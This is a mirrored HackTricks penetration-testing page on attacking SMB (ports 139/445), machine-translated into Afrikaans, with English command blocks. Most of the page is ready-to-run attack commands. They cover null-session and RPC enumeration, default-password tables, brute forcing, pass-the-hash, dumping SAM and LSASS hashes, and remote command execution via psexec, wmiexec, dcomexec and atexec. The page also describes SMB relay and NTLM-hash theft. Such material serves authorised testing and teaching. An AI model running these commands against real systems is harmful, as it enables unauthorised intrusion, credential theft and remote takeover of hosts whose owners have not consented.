mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 15:41:34 +00:00
544 lines
28 KiB
Markdown
544 lines
28 KiB
Markdown
# 139,445 - Pentesting SMB
|
||
|
||
<details>
|
||
|
||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Ander maniere om HackTricks te ondersteun:
|
||
|
||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||
|
||
</details>
|
||
|
||
## **Poort 139**
|
||
|
||
Die _**Netwerk Basiese Invoer/Uitvoer Stelsel**_** (NetBIOS)** is 'n sagtewareprotokol wat ontwerp is om toepassings, rekenaars en lessenaars binne 'n plaaslike area-netwerk (LAN) in staat te stel om met netwerkhardeware te interaksieer en **die oordrag van data oor die netwerk te fasiliteer**. Die identifikasie en ligging van sagtewaretoepassings wat op 'n NetBIOS-netwerk werk, word bereik deur hul NetBIOS-name, wat tot 16 karakters lank kan wees en dikwels verskil van die rekenaarnaam. 'n NetBIOS-sessie tussen twee toepassings word geïnisieer wanneer een toepassing (as die kliënt optree) 'n bevel uitreik om 'n ander toepassing (as die bediener optree) te "roep" deur gebruik te maak van **TCP-poort 139**.
|
||
```
|
||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||
```
|
||
## Poort 445
|
||
|
||
Tegnies gesproke word Poort 139 as 'NBT oor IP' verwys, terwyl Poort 445 geïdentifiseer word as 'SMB oor IP'. Die akroniem **SMB** staan vir 'Server Message Blocks', wat ook modern bekend is as die **Common Internet File System (CIFS)**. As 'n toepassingslaag-netwerkprotokol word SMB/CIFS hoofsaaklik gebruik om gedeelde toegang tot lêers, drukkers, seriële poorte moontlik te maak, en om verskeie vorms van kommunikasie tussen knooppunte op 'n netwerk te fasiliteer.
|
||
|
||
Byvoorbeeld, in die konteks van Windows, word beklemtoon dat SMB direk oor TCP/IP kan werk, wat die noodsaaklikheid vir NetBIOS oor TCP/IP uitskakel, deur die gebruik van poort 445. Daarteenoor, op verskillende stelsels, word die gebruik van poort 139 waargeneem, wat aandui dat SMB saam met NetBIOS oor TCP/IP uitgevoer word.
|
||
```
|
||
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
|
||
```
|
||
### SMB
|
||
|
||
Die **Server Message Block (SMB)** protokol, wat in 'n **klient-bediener** model werk, is ontwerp om **toegang tot lêers**, gids en ander netwerkbronne soos drukkers en roetepunte te reguleer. Primêr gebruik binne die **Windows** bedryfstelselreeks, verseker SMB agterwaartse versoenbaarheid, wat toestelle met nuwer weergawes van Microsoft se bedryfstelsel toelaat om naadloos te interaksieer met dié wat ouer weergawes hardloop. Daarbenewens bied die **Samba** projek 'n gratis sagteware-oplossing wat SMB se implementering op **Linux** en Unix-stelsels moontlik maak, wat sodoende kruisplatform kommunikasie deur SMB fasiliteer.
|
||
|
||
Shares, wat **willekeurige dele van die plaaslike lêerstelsel** voorstel, kan deur 'n SMB-bediener voorsien word, wat die hiërargie sienbaar maak vir 'n klient wat deels **onafhanklik** is van die werklike struktuur van die bediener. Die **Access Control Lists (ACLs)**, wat **toegangsregte** definieer, maak fynbeheerde beheer oor gebruikersregte moontlik, insluitend eienskappe soos **`uitvoer`**, **`lees`** en **`volle toegang`**. Hierdie regte kan aan individuele gebruikers of groepe toegewys word, gebaseer op die shares, en is afsonderlik van die plaaslike regte wat op die bediener ingestel is.
|
||
|
||
### IPC$ Share
|
||
|
||
Toegang tot die IPC$ share kan verkry word deur 'n anonieme nul-sessie, wat interaksie met dienste wat blootgestel word deur benoemde pype, moontlik maak. Die nut `enum4linux` is nuttig vir hierdie doel. Behoorlik gebruik, maak dit die verkryging van die volgende moontlik:
|
||
|
||
* Inligting oor die bedryfstelsel
|
||
* Besonderhede oor die ouer domein
|
||
* 'n Samestelling van plaaslike gebruikers en groepe
|
||
* Inligting oor beskikbare SMB shares
|
||
* Die effektiewe stelselsekuriteitsbeleid
|
||
|
||
Hierdie funksionaliteit is krities vir netwerkadministrateurs en sekuriteitsprofessionals om die sekuriteitspostuur van SMB (Server Message Block) dienste op 'n netwerk te assesseer. `enum4linux` bied 'n omvattende siening van die teikensisteem se SMB-omgewing, wat noodsaaklik is vir die identifisering van potensiële kwesbaarhede en om te verseker dat die SMB-dienste behoorlik beveilig is.
|
||
```bash
|
||
enum4linux -a target_ip
|
||
```
|
||
Die bogenoemde bevel is 'n voorbeeld van hoe `enum4linux` gebruik kan word om 'n volledige opname teen 'n teiken gespesifiseer deur `target_ip` uit te voer.
|
||
|
||
## Wat is NTLM
|
||
|
||
As jy nie weet wat NTLM is nie of as jy wil weet hoe dit werk en hoe om dit te misbruik, sal jy hierdie bladsy oor **NTLM** baie interessant vind waar **hoe hierdie protokol werk en hoe jy dit kan benut** verduidelik word:
|
||
|
||
{% content-ref url="../windows-hardening/ntlm/" %}
|
||
[ntlm](../windows-hardening/ntlm/)
|
||
{% endcontent-ref %}
|
||
|
||
## **Bedieneropname**
|
||
|
||
### **Skan** 'n netwerk om na gasheer te soek:
|
||
```bash
|
||
nbtscan -r 192.168.0.1/24
|
||
```
|
||
### SMB-bedienerweergawe
|
||
|
||
Om moontlike uitbuitings vir die SMB-weergawe te soek, is dit belangrik om te weet watter weergawe gebruik word. As hierdie inligting nie in ander gebruikte gereedskap verskyn nie, kan jy:
|
||
|
||
* Gebruik die **MSF** hulpmodule \_**auxiliary/scanner/smb/smb\_version**
|
||
* Of hierdie skrips:
|
||
```bash
|
||
#!/bin/sh
|
||
#Author: rewardone
|
||
#Description:
|
||
# Requires root or enough permissions to use tcpdump
|
||
# Will listen for the first 7 packets of a null login
|
||
# and grab the SMB Version
|
||
#Notes:
|
||
# Will sometimes not capture or will print multiple
|
||
# lines. May need to run a second time for success.
|
||
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
|
||
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
|
||
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
|
||
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
|
||
echo "" && sleep .1
|
||
```
|
||
### **Soek uitbuiting**
|
||
```bash
|
||
msf> search type:exploit platform:windows target:2008 smb
|
||
searchsploit microsoft smb
|
||
```
|
||
### **Moontlike** Gelde
|
||
|
||
| **Gebruikersnaam(s)** | **Gewone wagwoorde** |
|
||
| --------------------- | ---------------------------------------- |
|
||
| _(leeg)_ | _(leeg)_ |
|
||
| gas | _(leeg)_ |
|
||
| Administrateur, admin | _(leeg)_, wagwoord, administrateur, admin |
|
||
| arcserve | arcserve, rugsteun |
|
||
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
|
||
| backupexec, rugsteun | backupexec, rugsteun, arcada |
|
||
| toets, laboratorium, demonstrasie | wagwoord, toets, laboratorium, demonstrasie |
|
||
|
||
### Brute Force
|
||
|
||
* [**SMB Brute Force**](../generic-methodologies-and-resources/brute-force.md#smb)
|
||
|
||
### SMB Omgewingsinligting
|
||
|
||
### Verkry Inligting
|
||
```bash
|
||
#Dump interesting information
|
||
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
|
||
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
|
||
nmap --script "safe or smb-enum-*" -p 445 <IP>
|
||
|
||
#Connect to the rpc
|
||
rpcclient -U "" -N <IP> #No creds
|
||
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
|
||
rpcclient -U "username%passwd" <IP> #With creds
|
||
#You can use querydispinfo and enumdomusers to query user information
|
||
|
||
#Dump user information
|
||
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
||
|
||
#Map possible RPC endpoints
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
||
```
|
||
### Enumereer Gebruikers, Groepe & Ingeteken Gebruikers
|
||
|
||
Hierdie inligting behoort reeds ingesamel te wees deur enum4linux en enum4linux-ng
|
||
```bash
|
||
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
|
||
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
|
||
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
|
||
|
||
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
|
||
|
||
rpcclient -U "" -N 10.10.10.10
|
||
enumdomusers
|
||
enumdomgroups
|
||
```
|
||
### Enumereer plaaslike gebruikers
|
||
|
||
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
|
||
```bash
|
||
lookupsid.py -no-pass hostname.local
|
||
```
|
||
### Eenreël
|
||
```bash
|
||
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
|
||
```
|
||
### Metasploit - Enumereer plaaslike gebruikers
|
||
```bash
|
||
use auxiliary/scanner/smb/smb_lookupsid
|
||
set rhosts hostname.local
|
||
run
|
||
```
|
||
### **Enumerating LSARPC en SAMR rpcclient**
|
||
|
||
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
|
||
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
|
||
{% endcontent-ref %}
|
||
|
||
### GUI-verbinding vanaf Linux
|
||
|
||
#### In die terminaal:
|
||
|
||
`xdg-open smb://cascade.htb/`
|
||
|
||
#### In die lêerblaaier-venster (nautilus, thunar, ens.)
|
||
|
||
`smb://friendzone.htb/general/`
|
||
|
||
## Gedeelde Lêers Enumerasie
|
||
|
||
### Lys gedeelde lêers
|
||
|
||
Dit word altyd aanbeveel om te kyk of jy toegang tot enigiets kan kry, as jy nie geloofsbriewe het nie, probeer om **nul geloofsbriewe/gasgebruiker** te gebruik.
|
||
```bash
|
||
smbclient --no-pass -L //<IP> # Null user
|
||
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
|
||
|
||
smbmap -H <IP> [-P <PORT>] #Null user
|
||
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
|
||
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
|
||
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
|
||
|
||
crackmapexec smb <IP> -u '' -p '' --shares #Null user
|
||
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
|
||
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
|
||
```
|
||
### **Verbind/Lys 'n gedeelde lêer**
|
||
```bash
|
||
#Connect using smbclient
|
||
smbclient --no-pass //<IP>/<Folder>
|
||
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
|
||
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
|
||
|
||
#List with smbmap, without folder it list everything
|
||
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
|
||
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
|
||
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
|
||
```
|
||
### **Handmatig ontleed Windows-aandele en verbind daarmee**
|
||
|
||
Dit mag moontlik wees dat jy beperk is om enige aandele van die gasrekenaar te vertoon en wanneer jy probeer om hulle te lys, lyk dit asof daar geen aandele is om mee te verbind nie. Dit mag dus die moeite werd wees om handmatig met 'n aandeel te probeer verbind. Om die aandele handmatig te ontleed, wil jy dalk kyk vir reaksies soos NT\_STATUS\_ACCESS\_DENIED en NT\_STATUS\_BAD\_NETWORK\_NAME, wanneer jy 'n geldige sessie gebruik (bv. 'n nul-sessie of geldige geloofsbriewe). Hierdie kan aandui of die aandeel bestaan en jy nie toegang daartoe het nie, of dat die aandeel glad nie bestaan nie.
|
||
|
||
Gewone aandele name vir Windows teikens is
|
||
|
||
* C$
|
||
* D$
|
||
* ADMIN$
|
||
* IPC$
|
||
* PRINT$
|
||
* FAX$
|
||
* SYSVOL
|
||
* NETLOGON
|
||
|
||
(Gewone aandele name van _**Network Security Assessment 3de uitgawe**_)
|
||
|
||
Jy kan probeer om met hulle te verbind deur die volgende bevel te gebruik
|
||
```bash
|
||
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
|
||
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
|
||
```
|
||
vir hierdie skrip (deur 'n nul-sessie te gebruik)
|
||
```bash
|
||
#/bin/bash
|
||
|
||
ip='<TARGET-IP-HERE>'
|
||
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
|
||
|
||
for share in ${shares[*]}; do
|
||
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
|
||
|
||
if [[ -z $output ]]; then
|
||
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
|
||
else
|
||
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
|
||
fi
|
||
done
|
||
```
|
||
Voorbeelde
|
||
```bash
|
||
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
|
||
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
|
||
```
|
||
### **Enumerateer aandele vanaf Windows / sonder derdeparty-hulpmiddels**
|
||
|
||
PowerShell
|
||
```powershell
|
||
# Retrieves the SMB shares on the locale computer.
|
||
Get-SmbShare
|
||
Get-WmiObject -Class Win32_Share
|
||
# Retrieves the SMB shares on a remote computer.
|
||
get-smbshare -CimSession "<computer name or session object>"
|
||
# Retrieves the connections established from the local SMB client to the SMB servers.
|
||
Get-SmbConnection
|
||
```
|
||
CMD-konsole
|
||
```shell
|
||
# List shares on the local computer
|
||
net share
|
||
# List shares on a remote computer (including hidden ones)
|
||
net view \\<ip> /all
|
||
```
|
||
### MMC Snap-in (grafies)
|
||
```shell
|
||
# Shared Folders: Shared Folders > Shares
|
||
fsmgmt.msc
|
||
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
|
||
compmgmt.msc
|
||
```
|
||
explorer.exe (grafies), voer `\\<ip>\` in om die beskikbare nie-verborge aandele te sien.
|
||
|
||
### Monteer 'n gedeelde vouer
|
||
```bash
|
||
mount -t cifs //x.x.x.x/share /mnt/share
|
||
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
|
||
```
|
||
### **Laai lêers af**
|
||
|
||
Lees vorige afdelings om te leer hoe om te koppel met geloofsbriewe/Pass-the-Hash.
|
||
```bash
|
||
#Search a file and download
|
||
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
|
||
```
|
||
|
||
```bash
|
||
#Download all
|
||
smbclient //<IP>/<share>
|
||
> mask ""
|
||
> recurse
|
||
> prompt
|
||
> mget *
|
||
#Download everything to current directory
|
||
```
|
||
### Domein Gedeelde Lêersoek
|
||
|
||
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
|
||
```bash
|
||
Snaffler.exe -s -d domain.local -o snaffler.log -v data
|
||
```
|
||
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spinnekop.
|
||
* `-M spinnekop_plus [--share <share_name>]`
|
||
* `--patroon txt`
|
||
```bash
|
||
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
|
||
```
|
||
Veral interessant van aandele is die lêers genaamd **`Registry.xml`** omdat hulle **moontlik wagwoorde** kan bevat vir gebruikers wat ingestel is met **autologon** via Groepbeleid. Of **`web.config`** lêers omdat hulle geloofsbriewe bevat.
|
||
|
||
{% hint style="info" %}
|
||
Die **SYSVOL-aandeel** is **leesbaar** deur alle geautehtiseerde gebruikers in die domein. Daar kan jy baie verskillende bat, VBScript, en PowerShell **scripts** **vind**.\
|
||
Jy moet die **scripts** daarin **ondersoek** aangesien jy moontlik sensitiewe inligting soos **wagwoorde** kan **vind**.
|
||
{% endhint %}
|
||
|
||
## Lees Register
|
||
|
||
Jy kan dalk die register **lees** met behulp van sommige ontdekte geloofsbriewe. Impacket **`reg.py`** laat jou toe om te probeer:
|
||
```bash
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
|
||
```
|
||
## Naoeskatting
|
||
|
||
Die **standaard konfigurasie van** 'n **Samba**-bediener is gewoonlik geleë in `/etc/samba/smb.conf` en mag dalk enkele **gevaarlike konfigurasies** hê:
|
||
|
||
| **Instelling** | **Beskrywing** |
|
||
| --------------------------- | ------------------------------------------------------------------- |
|
||
| `browseable = yes` | Laat lys van beskikbare aandele in die huidige aandeel toe? |
|
||
| `read only = no` | Verbied die skep en wysiging van lêers? |
|
||
| `writable = yes` | Laat gebruikers toe om lêers te skep en te wysig? |
|
||
| `guest ok = yes` | Laat koppelings na die diens toe sonder om 'n wagwoord te gebruik? |
|
||
| `enable privileges = yes` | Eer voorregte wat aan spesifieke SID toegewys is? |
|
||
| `create mask = 0777` | Watter regte moet aan nuut geskepte lêers toegewys word? |
|
||
| `directory mask = 0777` | Watter regte moet aan nuut geskepte gids toegewys word? |
|
||
| `logon script = script.sh` | Watter skrip moet uitgevoer word met die gebruiker se aanmelding? |
|
||
| `magic script = script.sh` | Watter skrip moet uitgevoer word wanneer die skrip gesluit word? |
|
||
| `magic output = script.out` | Waar moet die uitset van die toor skrip gestoor word? |
|
||
|
||
Die opdrag `smbstatus` gee inligting oor die **bediener** en oor **wie gekoppel is**.
|
||
|
||
## Verifieer met Kerberos
|
||
|
||
Jy kan **verifieer** na **kerberos** met die gereedskap **smbclient** en **rpcclient**:
|
||
```bash
|
||
smbclient --kerberos //ws01win10.domain.com/C$
|
||
rpcclient -k ws01win10.domain.com
|
||
```
|
||
## **Voer Opdragte Uit**
|
||
|
||
### **crackmapexec**
|
||
|
||
crackmapexec kan opdragte uitvoer deur enige van die volgende te misbruik: **mmcexec, smbexec, atexec, wmiexec**, waarvan **wmiexec** die **verstek** metode is. Jy kan aandui watter opsie jy verkies om te gebruik met die parameter `--exec-method`:
|
||
```bash
|
||
apt-get install crackmapexec
|
||
|
||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
|
||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
|
||
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
|
||
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
|
||
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
|
||
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
|
||
```
|
||
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
|
||
|
||
Beide opsies sal 'n nuwe diens skep (deur _\pipe\svcctl_ via SMB te gebruik) op die slagoffer se masjien en dit gebruik om iets uit te voer (**psexec** sal 'n uitvoerbare lêer na ADMIN$ deel oplaai en **smbexec** sal na **cmd.exe/powershell.exe** wys en die lading in die argumente plaas --**lêerlose tegniek-**-).\
|
||
**Meer inligting** oor [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) en [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
|
||
In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./psexec.py [[domain/]username[:password]@]<targetName or address>
|
||
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
|
||
psexec \\192.168.122.66 -u Administrator -p 123456Ww
|
||
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
|
||
```
|
||
Gebruik die **parameter** `-k` om teen **kerberos** te verifieer in plaas van **NTLM**
|
||
|
||
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
|
||
|
||
Voer stiekem 'n bevelskulp uit sonder om die skyf aan te raak of 'n nuwe diens te hardloop deur DCOM te gebruik via **poort 135.**\
|
||
In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
|
||
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
|
||
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
||
```
|
||
Met die **parameter** `-k` kan jy teen **kerberos** verifieer in plaas van **NTLM**.
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
|
||
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
|
||
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
||
```
|
||
### [AtExec](../windows-hardening/ntlm/atexec.md)
|
||
|
||
Voer bevele uit via die Taakbeplanner (deur _\pipe\atsvc_ via SMB).\
|
||
In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
|
||
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
|
||
```
|
||
## Impacket verwysing
|
||
|
||
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
|
||
|
||
## **Bruteforce gebruikersgelde**
|
||
|
||
**Dit word nie aanbeveel nie, jy kan 'n rekening blokkeer as jy die maksimum toelaatbare pogings oorskry**
|
||
```bash
|
||
nmap --script smb-brute -p 445 <IP>
|
||
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
|
||
```
|
||
## SMB-relay aanval
|
||
|
||
Hierdie aanval maak gebruik van die Responder toolkit om **SMB-outentiseringsessies vas te vang** op 'n interne netwerk, en **skakel** hulle deur na 'n **teikenrekenaar**. As die outentiseringsessie **suksesvol is**, sal dit jou outomaties in 'n **sisteem** **shell** plaas.\
|
||
[**Meer inligting oor hierdie aanval hier.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||
|
||
## SMB-Valstrik
|
||
|
||
Die Windows-biblioteek URLMon.dll probeer outomaties outentiseer na die gasheer wanneer 'n bladsy probeer om toegang tot 'n paar inhoud te verkry via SMB, byvoorbeeld: `img src="\\10.10.10.10\path\image.jpg"`
|
||
|
||
Dit gebeur met die funksies:
|
||
|
||
* URLDownloadToFile
|
||
* URLDownloadToCache
|
||
* URLOpenStream
|
||
* URLOpenBlockingStream
|
||
|
||
Wat deur sommige blaaier en gereedskap (soos Skype) gebruik word
|
||
|
||
![Van: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
|
||
|
||
### SMB-Valstrik met MitMf
|
||
|
||
![Van: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
|
||
|
||
## NTLM-diefstal
|
||
|
||
Soortgelyk aan SMB-valstrik, kan die plant van skadelike lêers op 'n teikenstelsel (via SMB, byvoorbeeld) 'n SMB-outentiseringspoging uitlok, wat die NetNTLMv2-hash toelaat om met 'n hulpmiddel soos Responder onderskep te word. Die hash kan dan offline gekraak word of gebruik word in 'n [SMB-relay aanval](pentesting-smb.md#smb-relay-attack).
|
||
|
||
[Sien: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
|
||
|
||
## HackTricks Outomatiese Opdragte
|
||
```
|
||
Protocol_Name: SMB #Protocol Abbreviation if there is one.
|
||
Port_Number: 137,138,139 #Comma separated if there is more than one.
|
||
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
|
||
|
||
Entry_1:
|
||
Name: Notes
|
||
Description: Notes for SMB
|
||
Note: |
|
||
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
|
||
|
||
#These are the commands I run in order every time I see an open SMB port
|
||
|
||
With No Creds
|
||
nbtscan {IP}
|
||
smbmap -H {IP}
|
||
smbmap -H {IP} -u null -p null
|
||
smbmap -H {IP} -u guest
|
||
smbclient -N -L //{IP}
|
||
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
|
||
rpcclient {IP}
|
||
rpcclient -U "" {IP}
|
||
crackmapexec smb {IP}
|
||
crackmapexec smb {IP} --pass-pol -u "" -p ""
|
||
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
|
||
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
|
||
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
|
||
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
|
||
getArch.py -target {IP}
|
||
|
||
With Creds
|
||
smbmap -H {IP} -u {Username} -p {Password}
|
||
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
|
||
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
|
||
crackmapexec smb {IP} -u {Username} -p {Password} --shares
|
||
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
|
||
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
|
||
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
|
||
|
||
https://book.hacktricks.xyz/pentesting/pentesting-smb
|
||
|
||
Entry_2:
|
||
Name: Enum4Linux
|
||
Description: General SMB Scan
|
||
Command: enum4linux -a {IP}
|
||
|
||
Entry_3:
|
||
Name: Nmap SMB Scan 1
|
||
Description: SMB Vuln Scan With Nmap
|
||
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
